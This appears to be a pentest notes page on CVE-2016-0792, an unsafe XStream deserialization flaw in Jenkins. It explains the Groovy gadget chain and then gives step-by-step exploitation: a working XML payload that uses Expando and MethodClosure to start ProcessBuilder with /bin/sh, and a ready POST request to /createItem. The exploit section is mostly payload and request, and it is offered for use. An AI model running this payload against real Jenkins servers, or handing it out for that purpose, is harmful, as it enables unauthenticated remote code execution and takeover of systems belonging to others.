Skip to main content

xstream-vulnerability-in-jenkins-cve-2016-0792

Xstream Vulnerability in Jenkins (CVE-2016-0792)

CVE-2016-0792 is a remote code execution vulnerability in Jenkins caused by unsafe deserialization of user-supplied XML using XStream. Jenkins accepts serialized objects over HTTP endpoints and deserializes them without proper type restrictions, allowing attackers to execute arbitrary code on the server.

Root Cause

  • Jenkins uses XStream to deserialize XML into Java objects.
  • User-controlled XML is deserialized without a strict whitelist.
  • Jenkins bundles Groovy, which provides powerful gadget classes.
  • During deserialization, magic methods (e.g. hashCode) are implicitly invoked.
  • This allows attackers to chain gadgets and trigger ProcessBuilder / Runtime execution.

This Results in Unauthenticated Remote Code Execution.

Vulnerability Chain

  1. Attacker submits crafted XML payload
  2. Jenkins deserializes it via XStream
  3. Groovy gadget (MethodClosure) is instantiated
  4. Method execution is triggered during object handling
  5. Arbitrary OS command is executed

Exploit

Groovy-based gadget chain using Expando + MethodClosure:

Create a new item and click on Ok:

TODO image

Then intercept request like so:

TODO image

Then use the payload below for RCE:

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando"/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>/bin/sh</string>
                <string>-c</string>
                <string>id</string>
              </command>
            </owner>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>

In this request:

info

Make sure to edut the request with correct Content-Type as xml and make sure to add ?name=anything parameter.

POST /createItem?name=test HTTP/1.1
Host: jenkins.local
Content-Type: application/xml
Content-Length: ...

[payload]
  • Deserialization occurs automatically
  • Command execution happens during object processing
info

Error Messege even on 500 Internal Server Error page is a good sign.